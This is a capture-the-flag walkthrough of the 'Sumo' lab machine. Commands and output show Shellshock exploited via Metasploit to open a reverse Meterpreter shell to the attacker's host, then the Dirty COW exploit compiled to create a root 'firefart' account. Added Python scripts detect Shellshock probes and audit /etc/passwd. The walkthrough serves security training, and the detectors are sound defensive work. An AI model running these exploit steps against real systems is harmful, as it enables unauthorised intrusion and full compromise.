Proving Grounds: Sumo Walkthrough
Machine Stats
Name: Sumo
OS: Ubuntu Linux 12.04
Rating: Easy
Enumeration
I started by running my standard nmap scan.
└─$ nmap -A -T4 -p- 192.168.195.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 22:10 EDT
Nmap scan report for 192.168.195.87
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds
Here we can see an open web server. I ran a gobuster directory enumeration scan, but it didn't return anything too interesting on the surface.
└─$ gobuster dir -u http://192.168.195.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/index (Status: 200) [Size: 177]
/server-status (Status: 403) [Size: 295]
I like to scan all webservers with Nikto secondarily, so I gave this a shot. (extraneous information removed below, denoted with <..> markers)
└─$ nikto -h 192.168.195.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.195.87
+ Target Hostname: 192.168.195.87
+ Target Port: 80
+ Start Time: 2022-03-22 22:13:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
<..>
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
<..>
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-03-22 22:18:58 (GMT-4) (301 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
User Account
Alright, well I am feeling lazy so I’m going to use Metasploit for this. I wanted the exploit with the best reliability, and chose this one, rated “excellent”:
msfconsole
msf6 > search shellshock
<..>
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
<..>
msf6 > use 1
With the module selected, I set the following options:
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.sh
TARGETURI => /cgi-bin/test.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 192.168.195.87
rhost => 192.168.195.87
I crossed my fingers and ran the dang thing.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.49.195:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to 192.168.195.87
[*] Meterpreter session 1 opened (192.168.49.195:4444 -> 192.168.195.87:44683 ) at 2022-03-22 22:23:39 -0400
meterpreter > getuid
Server username: www-data
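As a defender-side counterpart to the Shellshock step above, here is an added example (not code from the original walkthrough) that flags probes of this kind in Apache combined-format access logs. It assumes the combined format, so it only sees the request line, Referer and User-Agent; the log lines are constructed.

```python
"""Flag Shellshock-style probes in Apache combined-format access logs.

Added example, not part of the original walkthrough. The log lines below are
constructed. The indicator is the bash function-definition prefix '() {' that the
CVE-2014-6271 family relies on, arriving in a field mod_cgi exports to the
script's environment.
"""
import re

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Bash function-definition prefix as it appears in a header value or request line
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def parse_line(line):
    """Return the combined-format fields as a dict, or None for a line that does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def is_shellshock_probe(entry):
    """True if any attacker-controlled field carries the '() {' prefix."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ("request", "referer", "agent"))

def find_probes(lines):
    """Return (source host, path, 'cgi'|'non-cgi') for each flagged request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not is_shellshock_probe(entry):
            continue
        req = entry["request"].split(" ")
        path = req[1] if len(req) >= 2 else entry["request"]
        # A hit against /cgi-bin/ is the case Nikto reported above; elsewhere it is still a scan.
        hits.append((entry["host"], path, "cgi" if path.startswith("/cgi-bin/") else "non-cgi"))
    return hits

# Constructed sample: one normal request, one probe in User-Agent, one in Referer
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Mar/2022:22:13:57 -0400] "GET /index HTTP/1.1" 200 177 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Mar/2022:22:15:02 -0400] "GET /cgi-bin/test.sh HTTP/1.1" 200 45 "-" "() { :;}; echo probe"',
    '10.0.0.9 - - [22/Mar/2022:22:15:03 -0400] "GET /index HTTP/1.1" 200 177 "() { :;}; echo probe" "curl/7.81"',
]

if __name__ == "__main__":
    for host, path, kind in find_probes(SAMPLE_LOG):
        print(f"shellshock probe from {host} -> {path} ({kind})")
```

Headers other than User-Agent and Referer are not written to the access log, so a full check also needs a WAF or mod_security rule on the raw request.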
I wanted to get some info about the system, bring over my linpeas.sh script for enumerating weaknesses and exploits, and also grab the low privilege user flag.
meterpreter > sysinfo
Computer : 192.168.195.87
OS : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > upload /var/www/html/linpeas.sh /tmp
[*] uploading : /var/www/html/linpeas.sh -> /tmp
[*] uploaded : /var/www/html/linpeas.sh -> /tmp/linpeas.sh
meterpreter > download ./local.txt
[*] Downloading: ./local.txt -> /home/me/local.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): ./local.txt -> /home/me/local.txt
[*] download : ./local.txt -> /home/me/local.txt
└─$ cat local.txt
27ebb54576d99c4fe58fea8a02ed4c29
Privilege Escalation & Root Flag
Checking out the linpeas output, I noticed immediately that the machine was vulnerable to the infamous dirtycow privilege escalation route. I was also kind of surprised not to find a working Metasploit module for this one. There was a litany of other potential vulnerabilities, but I already knew this one by name, so I figured it was probably the way to go here.
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
I confirmed that the victim machine had GCC available to compile the exploit's C code, then backgrounded my shell session to drop back to meterpreter and upload it.
meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40839.c /tmp
[*] uploading : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp
[*] uploaded : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp/40839.c
I then returned to my system shell via the session I had just backgrounded and ran the exploit as described on the Exploit-DB page.
gcc -pthread 40839.c -o dirty -lcrypt
./dirty
I set the password to “test” and waited for the exploit to continue.
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: 7f01a3ef0000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: 7f01a3ef0000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Browsing the exploit code, I can see that the username being created here is firefart. I opened a new terminal and SSH'ed to the victim machine as this user, with the password I had just set (test).
└─$ ssh firefart@192.168.195.87
firefart@192.168.195.87's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:~# cat /root/proof.txt
19364e26117c54edc20b6fa5eadd0fa5
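The exploit's own output tells you what it leaves behind: a UID-0 account named firefart with its password hash in /etc/passwd, plus a backup in /tmp. Here is an added example (not code from the walkthrough or the exploit) that audits a passwd file for exactly those artifacts; the sample file contents are constructed.

```python
"""Audit /etc/passwd for the artifacts a Dirty COW (CVE-2016-5195) passwd overwrite leaves
behind: an extra UID-0 account, a hash stored in /etc/passwd instead of /etc/shadow, and
the backup the public exploit leaves in /tmp. Added example, not part of the original
walkthrough; SAMPLE_PASSWD is constructed and its firefart line is the one printed above.
"""
import os

def parse_passwd(text):
    """Yield (name, pwfield, uid, gid, gecos, home, shell) for each well-formed entry."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue  # malformed entry; a fuller audit would report it as well
        name, pw, uid, gid, gecos, home, shell = parts
        yield name, pw, int(uid), gid, gecos, home, shell

def audit_passwd(text, allowed_root_names=("root",)):
    """Return (severity, message) findings; an empty list means nothing suspicious."""
    findings = []
    names = set()
    for name, pw, uid, _gid, gecos, _home, shell in parse_passwd(text):
        names.add(name)
        if uid == 0 and name not in allowed_root_names:
            findings.append(("high", f"extra UID-0 account '{name}' (gecos='{gecos}', shell={shell})"))
        if pw == "":
            findings.append(("high", f"empty password field for '{name}'"))
        # Shadowed systems keep 'x'; '*', '!' and '!!' lock the account. Anything else is a live hash.
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(("high", f"password hash stored directly in /etc/passwd for '{name}'"))
    if "root" not in names:
        findings.append(("high", "no 'root' entry: the first line may have been overwritten"))
    return findings

def leftover_backup(path="/tmp/passwd.bak"):
    """The exploit writes this backup and reminds the user to restore it; its presence is an indicator."""
    return os.path.exists(path)

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
"""

if __name__ == "__main__":
    for sev, msg in audit_passwd(SAMPLE_PASSWD):
        print(f"[{sev}] {msg}")
```

On a live host, feed it the real file with audit_passwd(open("/etc/passwd").read()) and pair the result with leftover_backup().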
I submitted this flag and it was accepted.